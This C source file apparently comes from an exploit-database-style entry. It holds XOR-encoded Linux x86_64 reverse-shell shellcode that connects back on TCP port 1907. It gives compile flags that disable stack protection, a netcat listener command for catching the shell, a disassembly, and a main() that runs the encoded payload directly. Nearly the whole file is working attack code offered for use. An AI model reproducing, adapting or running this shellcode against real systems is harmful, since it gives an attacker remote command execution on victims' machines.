/*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
Test:
run your machine: nc -vlp 1907
and run exploit (./reverse-shell)
check shellcode raw and test ls, who, pwd command.
assembly code is below:
xor %rcx,%rcx
sub $0xfffffffffffffff6,%rcx
lea -0x11(%rip),%rax # 0x555555558060
movabs $0x28467171b1064bdf,%rbx
xor %rbx,0x27(%rax)
sub $0xfffffffffffffff8,%rax
loop 0x55555555807b
mov $0x62,%ch
pop %rsi
sub %bl,(%rbx)
jae 0x5555555580a7
rex.X ficoms -0x19c64bf7(%rip) # 0x55553b8f349e
xchg %eax,%ecx
fisttpll 0x1(%rbx)
retq $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
(bad)
sbb $0x42,%al
cmc
adc (%rcx),%ecx
mov $0x1b,%ah
jb 0x5555555580c6
and %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub %esp,(%rcx)
cmp $0xfd39e8e9,%eax
mov $0x29e6822,%ebp
sbb %eax,0x7b(%rsi)
xchg %eax,%edi
retq $0xe3e1
es cmp %ecx,%edi
rorb 0x6(%rsi)
mov $0x71,%cl
jno 0x55555555811c
sub %al,(%rax)
*/
#include
#include
unsigned char shellproccod[] = \
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xdf\x4b\x06\xb1\x71\x71\x46\x28\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb5\x62\x5e\x28\x1b\x73"
"\x19\x42\xde\x15\x09\xb4\x39\xe6\x0e\x91\xdd\x4b\x01\xc2\x0e"
"\x71\x46\x29\x8e\x03\x8f\x57\x1b\x61\x1c\x42\xf5\x13\x09\xb4"
"\x1b\x72\x18\x60\x20\x85\x6c\x90\x29\x7e\x43\x5d\x29\x21\x3d"
"\xe9\xe8\x39\xfd\x07\xbd\x22\x68\x9e\x02\x19\x46\x7b\x97\xc2"
"\xe1\xe3\x26\x39\xcf\xce\xd0\x4e\x06\xb1\x71\x71\x46\x28";
int main()
{
printf("Shellcode len: %d\n", strlen(shellproccod));
int (*ret)() = (int(*)())shellproccod;
ret();
}